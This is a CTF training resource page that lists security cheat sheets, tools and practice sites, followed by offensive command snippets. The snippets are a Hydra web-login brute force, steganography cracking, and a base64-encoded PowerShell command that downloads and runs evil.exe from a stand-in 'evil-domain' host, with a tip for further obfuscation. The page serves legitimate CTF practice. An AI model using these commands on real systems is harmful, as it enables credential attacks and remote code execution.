CTF Training and Resources

Contents

Cheat Sheets
Tools
Training
Commands

Cheat Sheets

• Tmux Cheat Sheet
• Docker Cheat Sheet
• GTFO Bins (Linux)
• LOLBas (Windows)
• Payload All The Things
• MSFVenom Reverse Shell Payload Cheatsheet
• Metasploit Cheat Sheet
• PCWDLD Linux Command Reference Guide

Tools

• Exploit Database
• Cyber Chef
• Online Decoder
• LinPEAS (Linux Privesc Binary)
• WinPEAS (Windows Privesc)
• DNS Exfil Tool
• Volatility (memory extraction utility framework)
• Online Hash Crackers:
  • Crackstation
  • MD5Decrypt
  • Hashes.com

Training

• Try Hack Me Learning Paths
• USAF Digital University (thousands of free training courses for anyone with an AF email)
• Reverse Engineering - NSA Codebreaker Challenge
• Reverse Engineering - Nightmare
• Awesome CTF
• Pico CTF

Commands

• Use Hydra to brute-force web page login
  • Command: sudo hydra -l <username> -P <password list> <IP> http-post-form "/<login page>:username=^USER^&password=^PASS^:<Invalid Login Message>"
  • Use -L <username list> to use a list instead of a single username
  • The parameters may need to be adjusted to the request the webpage is expecting, i.e. another common parameter used may look something like login=true
  • Example: sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.10 http-post-form "/login.php:username=^USER^&password=^PASS^&login=true:Invalid Username or Password"
• Steghide/Stegcracker
  • Use Steghide to embed a text file inside an image: steghide embed -cf <image file> -ef <text file>
  • Use Steghide to extract message from an image: steghide extract -sf <image file>
  • Use Stegcracker to brute force crack a password protected file hidden in image file: stegcracker <image file> <wordlist>
• Powershell execute encoded commands:
  • Run on Windows machine that is not the target:
    $command = '<your command>' $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) echo $encodedCommand
  • Run on target machine:
    powershell.exe -encodedCommand '<value of $encodedCommand>'
  • Example:

  powershell.exe -encodedCommand 'dwBnAGUAdAAgAGgAdAB0AHAAOgAvAC8AZQB2AGkAbAAtAGQAbwBtAGEAaQBuAC4AYwBvAG0ALwBlAHYAaQBsAC4AZQB4AGUAOwAgAHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIABlAHYAaQBsAC4AZQB4AGUA'
  

  • The command above decodes to `wget http://evil-domain.com/evil.exe; start-process evil.exe' which pulls an executable from an evil domain hosting the file then executes it.
  • Tip: To further obfuscate the execution use shortened versions of the argument such as -enco instead of -encodedCommand.
• Useful Linux Commands
  • Find SUID Bits: find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
  • TTY shell
    python 3 -c 'import pty; pty.spawn("/bin/bash")' export TERM=xterm Ctrl + z stty raw -echo;fg
  • chattr +i /root/king.txt #make file immutable
  • sudo -l
  • fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt /path/to/file
  • Start a Python WebServer for quick file sharing
    • Python 2: python2 -m SimpleHTTPServer <port>
    • Python 3: python3 -m http.server <port>
    • With either, use curl or wget to grab files
      • curl http://<hosting ip>:<port>/file > output
      • wget http://<hosting ip>:<port>/file > output